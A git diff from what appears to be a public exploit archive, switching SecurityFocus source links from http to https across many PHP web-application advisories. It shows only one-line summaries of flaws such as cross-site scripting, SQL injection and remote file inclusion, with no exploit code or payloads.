7d02879e4..1d07a972c 100644 --- a/exploits/php/webapps/27506.txt +++ b/exploits/php/webapps/27506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27507.txt b/exploits/php/webapps/27507.txt index 5faf181cd..7e253c799 100644 --- a/exploits/php/webapps/27507.txt +++ b/exploits/php/webapps/27507.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17289/info +source: https://www.securityfocus.com/bid/17289/info AL-Caricatier is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27509.txt b/exploits/php/webapps/27509.txt index ee84cf65b..55cb6b219 100644 --- a/exploits/php/webapps/27509.txt +++ b/exploits/php/webapps/27509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17298/info +source: https://www.securityfocus.com/bid/17298/info OneOrZero Helpdesk is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27510.txt b/exploits/php/webapps/27510.txt index 33e12c83a..571f69f05 100644 --- a/exploits/php/webapps/27510.txt +++ b/exploits/php/webapps/27510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17306/info +source: https://www.securityfocus.com/bid/17306/info PhxContacts is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27511.txt b/exploits/php/webapps/27511.txt index c5d3e764f..bb59f7af1 100644 --- a/exploits/php/webapps/27511.txt +++ b/exploits/php/webapps/27511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17306/info +source: https://www.securityfocus.com/bid/17306/info PhxContacts is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27512.txt b/exploits/php/webapps/27512.txt index e92d739a6..7f07d2114 100644 --- a/exploits/php/webapps/27512.txt +++ b/exploits/php/webapps/27512.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17307/info +source: https://www.securityfocus.com/bid/17307/info PhxContacts is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27513.txt b/exploits/php/webapps/27513.txt index 03b606d8c..7a95d53c0 100644 --- a/exploits/php/webapps/27513.txt +++ b/exploits/php/webapps/27513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17316/info +source: https://www.securityfocus.com/bid/17316/info VNews is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27533.txt b/exploits/php/webapps/27533.txt index 1dad74cdf..4c1be37c8 100644 --- a/exploits/php/webapps/27533.txt +++ b/exploits/php/webapps/27533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17322/info +source: https://www.securityfocus.com/bid/17322/info X-Changer is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27534.txt b/exploits/php/webapps/27534.txt index e0cdedf65..1c975a780 100644 --- a/exploits/php/webapps/27534.txt +++ b/exploits/php/webapps/27534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17323/info +source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27535.txt b/exploits/php/webapps/27535.txt index 73b827643..5e96dbf99 100644 --- a/exploits/php/webapps/27535.txt +++ b/exploits/php/webapps/27535.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17324/info +source: https://www.securityfocus.com/bid/17324/info Oxygen is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27537.txt b/exploits/php/webapps/27537.txt index 94bd08feb..16eed39e0 100644 --- a/exploits/php/webapps/27537.txt +++ b/exploits/php/webapps/27537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17334/info +source: https://www.securityfocus.com/bid/17334/info Warcraft III Replay Parser for PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27538.txt b/exploits/php/webapps/27538.txt index 090293ed3..76cffb299 100644 --- a/exploits/php/webapps/27538.txt +++ b/exploits/php/webapps/27538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17336/info +source: https://www.securityfocus.com/bid/17336/info RedCMS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27539.txt b/exploits/php/webapps/27539.txt index 6477b21b1..f72ddda6a 100644 --- a/exploits/php/webapps/27539.txt +++ b/exploits/php/webapps/27539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17336/info +source: https://www.securityfocus.com/bid/17336/info RedCMS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27540.txt b/exploits/php/webapps/27540.txt index 83c10011c..e878d47da 100644 --- a/exploits/php/webapps/27540.txt +++ b/exploits/php/webapps/27540.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17336/info +source: https://www.securityfocus.com/bid/17336/info RedCMS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27541.txt b/exploits/php/webapps/27541.txt index fe03e7bb7..15deaea70 100644 --- a/exploits/php/webapps/27541.txt +++ b/exploits/php/webapps/27541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17338/info +source: https://www.securityfocus.com/bid/17338/info DbbS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27542.txt b/exploits/php/webapps/27542.txt index 8a3d97716..2120338cf 100644 --- a/exploits/php/webapps/27542.txt +++ b/exploits/php/webapps/27542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27543.txt b/exploits/php/webapps/27543.txt index 4021350fe..a4b76ad42 100644 --- a/exploits/php/webapps/27543.txt +++ b/exploits/php/webapps/27543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27544.txt b/exploits/php/webapps/27544.txt index 0b3425a15..5448cd99e 100644 --- a/exploits/php/webapps/27544.txt +++ b/exploits/php/webapps/27544.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27545.txt b/exploits/php/webapps/27545.txt index b2f9bcdd1..e844488a0 100644 --- a/exploits/php/webapps/27545.txt +++ b/exploits/php/webapps/27545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27546.txt b/exploits/php/webapps/27546.txt index 8db030c80..a689fb6de 100644 --- a/exploits/php/webapps/27546.txt +++ b/exploits/php/webapps/27546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27548.txt b/exploits/php/webapps/27548.txt index 74333d8fa..60c3f3016 100644 --- a/exploits/php/webapps/27548.txt +++ b/exploits/php/webapps/27548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17343/info +source: https://www.securityfocus.com/bid/17343/info Claroline is prone to an information-disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27549.txt b/exploits/php/webapps/27549.txt index 5ca1b9f17..d6b67f0ed 100644 --- a/exploits/php/webapps/27549.txt +++ b/exploits/php/webapps/27549.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17344/info +source: https://www.securityfocus.com/bid/17344/info Claroline is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27550.txt b/exploits/php/webapps/27550.txt index a4113ffd1..a4773f927 100644 --- a/exploits/php/webapps/27550.txt +++ b/exploits/php/webapps/27550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17345/info +source: https://www.securityfocus.com/bid/17345/info Blank'N'Berg is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27551.txt b/exploits/php/webapps/27551.txt index fcac7b5bc..48b5ffa1b 100644 --- a/exploits/php/webapps/27551.txt +++ b/exploits/php/webapps/27551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17346/info +source: https://www.securityfocus.com/bid/17346/info Blank'N'Berg is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27557.pl b/exploits/php/webapps/27557.pl index 24c9322c2..faee0ef96 100755 --- a/exploits/php/webapps/27557.pl +++ b/exploits/php/webapps/27557.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17348/info +source: https://www.securityfocus.com/bid/17348/info Submit-A-Link is prone to an HTML-injection vulnerability. The script fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27560.txt b/exploits/php/webapps/27560.txt index 457f8cfdb..97e8b8a72 100644 --- a/exploits/php/webapps/27560.txt +++ b/exploits/php/webapps/27560.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17352/info +source: https://www.securityfocus.com/bid/17352/info aWebBB is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27563.txt b/exploits/php/webapps/27563.txt index 4d76974ea..50f11a340 100644 --- a/exploits/php/webapps/27563.txt +++ b/exploits/php/webapps/27563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17360/info +source: https://www.securityfocus.com/bid/17360/info LucidCMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27567.txt b/exploits/php/webapps/27567.txt index a6c4cc294..000d5f5c1 100644 --- a/exploits/php/webapps/27567.txt +++ b/exploits/php/webapps/27567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17375/info +source: https://www.securityfocus.com/bid/17375/info ArabPortal is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27570.txt b/exploits/php/webapps/27570.txt index 76d017c6c..620b023a1 100644 --- a/exploits/php/webapps/27570.txt +++ b/exploits/php/webapps/27570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17387/info +source: https://www.securityfocus.com/bid/17387/info N.T. is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27571.txt b/exploits/php/webapps/27571.txt index 6c04cd9c7..076435b83 100644 
--- a/exploits/php/webapps/27571.txt +++ b/exploits/php/webapps/27571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17389/info +source: https://www.securityfocus.com/bid/17389/info SKForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27572.txt b/exploits/php/webapps/27572.txt index 689077a6c..caabceeb8 100644 --- a/exploits/php/webapps/27572.txt +++ b/exploits/php/webapps/27572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17389/info +source: https://www.securityfocus.com/bid/17389/info SKForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27573.txt b/exploits/php/webapps/27573.txt index 3d719707d..3858abadd 100644 --- a/exploits/php/webapps/27573.txt +++ b/exploits/php/webapps/27573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17389/info +source: https://www.securityfocus.com/bid/17389/info SKForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27574.txt b/exploits/php/webapps/27574.txt index f588bb796..ce22d7b9e 100644 --- a/exploits/php/webapps/27574.txt +++ b/exploits/php/webapps/27574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17391/info +source: https://www.securityfocus.com/bid/17391/info BASE is prone to a cross-site scripting vulnerability. The application fails to properly sanitize user-supplied input in the 'PrintFreshPage' function. diff --git a/exploits/php/webapps/27575.txt b/exploits/php/webapps/27575.txt index 23162a3e4..34c4b3bea 100644 --- a/exploits/php/webapps/27575.txt +++ b/exploits/php/webapps/27575.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17394/info +source: https://www.securityfocus.com/bid/17394/info MD News is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27576.txt b/exploits/php/webapps/27576.txt index f382ed30e..86d2202a3 100644 --- a/exploits/php/webapps/27576.txt +++ b/exploits/php/webapps/27576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17399/info +source: https://www.securityfocus.com/bid/17399/info MAXDEV CMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27578.txt b/exploits/php/webapps/27578.txt index 96b0245f3..56a7d5287 100644 --- a/exploits/php/webapps/27578.txt +++ b/exploits/php/webapps/27578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17405/info +source: https://www.securityfocus.com/bid/17405/info Jupiter CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27579.txt b/exploits/php/webapps/27579.txt index cc7437a0e..a68fcabc9 100644 --- a/exploits/php/webapps/27579.txt +++ b/exploits/php/webapps/27579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17406/info +source: https://www.securityfocus.com/bid/17406/info Bitweaver CMS is prone to multiple cross-site scripting vulnerabilities. Thess issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27580.txt b/exploits/php/webapps/27580.txt index ce838a4c2..63afb4ad2 100644 --- a/exploits/php/webapps/27580.txt +++ b/exploits/php/webapps/27580.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17407/info +source: https://www.securityfocus.com/bid/17407/info vBulletin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27582.txt b/exploits/php/webapps/27582.txt index b23da7546..1b49f39cb 100644 --- a/exploits/php/webapps/27582.txt +++ b/exploits/php/webapps/27582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17416/info +source: https://www.securityfocus.com/bid/17416/info AWeb's Banner Generator is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27584.txt b/exploits/php/webapps/27584.txt index 93eeaee2e..812389365 100644 --- a/exploits/php/webapps/27584.txt +++ b/exploits/php/webapps/27584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17419/info +source: https://www.securityfocus.com/bid/17419/info JBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27585.txt b/exploits/php/webapps/27585.txt index e88d36de6..451a78d55 100644 --- a/exploits/php/webapps/27585.txt +++ b/exploits/php/webapps/27585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17420/info +source: https://www.securityfocus.com/bid/17420/info phpMyForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27586.txt b/exploits/php/webapps/27586.txt index f3ca65145..d223ddb59 100644 --- a/exploits/php/webapps/27586.txt +++ b/exploits/php/webapps/27586.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17420/info +source: https://www.securityfocus.com/bid/17420/info phpMyForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27587.txt b/exploits/php/webapps/27587.txt index eb058d491..d70c1f948 100644 --- a/exploits/php/webapps/27587.txt +++ b/exploits/php/webapps/27587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17421/info +source: https://www.securityfocus.com/bid/17421/info PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27588.txt b/exploits/php/webapps/27588.txt index 252210768..479097cbb 100644 --- a/exploits/php/webapps/27588.txt +++ b/exploits/php/webapps/27588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17421/info +source: https://www.securityfocus.com/bid/17421/info PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27589.txt b/exploits/php/webapps/27589.txt index e201ab446..b053204c6 100644 --- a/exploits/php/webapps/27589.txt +++ b/exploits/php/webapps/27589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17423/info +source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27590.txt b/exploits/php/webapps/27590.txt index f389dab9a..9ed269cfa 100644 --- a/exploits/php/webapps/27590.txt +++ b/exploits/php/webapps/27590.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17425/info +source: https://www.securityfocus.com/bid/17425/info APT-webshop is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27591.txt b/exploits/php/webapps/27591.txt index 59d74d3d8..98d8aead5 100644 --- a/exploits/php/webapps/27591.txt +++ b/exploits/php/webapps/27591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17430/info +source: https://www.securityfocus.com/bid/17430/info Shadowed Portal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27592.txt b/exploits/php/webapps/27592.txt index 6ea32fb9f..72185e64a 100644 --- a/exploits/php/webapps/27592.txt +++ b/exploits/php/webapps/27592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17431/info +source: https://www.securityfocus.com/bid/17431/info SIRE is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/27593.txt b/exploits/php/webapps/27593.txt index b970be968..d0fb86a2c 100644 --- a/exploits/php/webapps/27593.txt +++ b/exploits/php/webapps/27593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17433/info +source: https://www.securityfocus.com/bid/17433/info VegaDNS is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27612.txt b/exploits/php/webapps/27612.txt index f2331c620..59123ac7f 100644 --- a/exploits/php/webapps/27612.txt +++ b/exploits/php/webapps/27612.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17441/info +source: https://www.securityfocus.com/bid/17441/info ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27613.txt b/exploits/php/webapps/27613.txt index 9ca406c24..36941a444 100644 --- a/exploits/php/webapps/27613.txt +++ b/exploits/php/webapps/27613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17441/info +source: https://www.securityfocus.com/bid/17441/info ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27614.txt b/exploits/php/webapps/27614.txt index 692b9fd87..fbd4873a0 100644 --- a/exploits/php/webapps/27614.txt +++ b/exploits/php/webapps/27614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17441/info +source: https://www.securityfocus.com/bid/17441/info ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27615.txt b/exploits/php/webapps/27615.txt index 74e2e3f73..9ea512330 100644 --- a/exploits/php/webapps/27615.txt +++ b/exploits/php/webapps/27615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17447/info +source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27616.txt b/exploits/php/webapps/27616.txt index 3bdcb75e6..3eb64b543 100644 --- a/exploits/php/webapps/27616.txt +++ b/exploits/php/webapps/27616.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27617.txt b/exploits/php/webapps/27617.txt index 94f741dce..8d3cb82e5 100644 --- a/exploits/php/webapps/27617.txt +++ b/exploits/php/webapps/27617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27618.txt b/exploits/php/webapps/27618.txt index 3b4f04e2b..4fc065412 100644 --- a/exploits/php/webapps/27618.txt +++ b/exploits/php/webapps/27618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27619.txt b/exploits/php/webapps/27619.txt index 6b98b06e9..56f8fae82 100644 --- a/exploits/php/webapps/27619.txt +++ b/exploits/php/webapps/27619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27621.txt b/exploits/php/webapps/27621.txt index d92634c58..0cf44d2d6 100644 --- a/exploits/php/webapps/27621.txt +++ b/exploits/php/webapps/27621.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17461/info +source: https://www.securityfocus.com/bid/17461/info Clever Copy is prone to an information-disclosure vulnerability. A remote attacker could leverage this issue to gain access to sensitive configuration information. The attacker could then use this information to launch further attacks against the system. diff --git a/exploits/php/webapps/27622.txt b/exploits/php/webapps/27622.txt index 455cddd65..5015a5c4e 100644 --- a/exploits/php/webapps/27622.txt +++ b/exploits/php/webapps/27622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17463/info +source: https://www.securityfocus.com/bid/17463/info Dokeos is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27623.txt b/exploits/php/webapps/27623.txt index 8486ceef3..ee39ebbd4 100644 --- a/exploits/php/webapps/27623.txt +++ b/exploits/php/webapps/27623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17466/info +source: https://www.securityfocus.com/bid/17466/info Confixx is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27624.txt b/exploits/php/webapps/27624.txt index 4622e433c..b9edc2d38 100644 --- a/exploits/php/webapps/27624.txt +++ b/exploits/php/webapps/27624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17467/info +source: https://www.securityfocus.com/bid/17467/info PHPKIT is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27625.txt b/exploits/php/webapps/27625.txt index da539cd30..9236e6c9c 100644 --- a/exploits/php/webapps/27625.txt +++ b/exploits/php/webapps/27625.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17470/info +source: https://www.securityfocus.com/bid/17470/info The 'indexu' application is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27626.txt b/exploits/php/webapps/27626.txt index f4c8a07a1..1721571f5 100644 --- a/exploits/php/webapps/27626.txt +++ b/exploits/php/webapps/27626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17473/info +source: https://www.securityfocus.com/bid/17473/info Tritanium Bulletin Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27628.txt b/exploits/php/webapps/27628.txt index 0a927e02f..23846d434 100644 --- a/exploits/php/webapps/27628.txt +++ b/exploits/php/webapps/27628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17476/info +source: https://www.securityfocus.com/bid/17476/info Confixx is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27629.txt b/exploits/php/webapps/27629.txt index 10a7cd327..f54e02d4f 100644 --- a/exploits/php/webapps/27629.txt +++ b/exploits/php/webapps/27629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17483/info +source: https://www.securityfocus.com/bid/17483/info Chipmunk Guestbook is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27632.txt b/exploits/php/webapps/27632.txt index 6df9eb986..57926facc 100644 --- a/exploits/php/webapps/27632.txt +++ b/exploits/php/webapps/27632.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17487/info +source: https://www.securityfocus.com/bid/17487/info PHPMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27633.txt b/exploits/php/webapps/27633.txt index 0fcbc36d5..f48958376 100644 --- a/exploits/php/webapps/27633.txt +++ b/exploits/php/webapps/27633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17492/info +source: https://www.securityfocus.com/bid/17492/info MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27634.txt b/exploits/php/webapps/27634.txt index 882e69c2b..e7d891f8b 100644 --- a/exploits/php/webapps/27634.txt +++ b/exploits/php/webapps/27634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17495/info +source: https://www.securityfocus.com/bid/17495/info PatroNet CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27638.pl b/exploits/php/webapps/27638.pl index f1129814c..b359fe3b9 100755 --- a/exploits/php/webapps/27638.pl +++ b/exploits/php/webapps/27638.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17501/info +source: https://www.securityfocus.com/bid/17501/info SimpleBBS is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27642.txt b/exploits/php/webapps/27642.txt index 81129739b..f34bc8a88 100644 --- a/exploits/php/webapps/27642.txt +++ b/exploits/php/webapps/27642.txt 
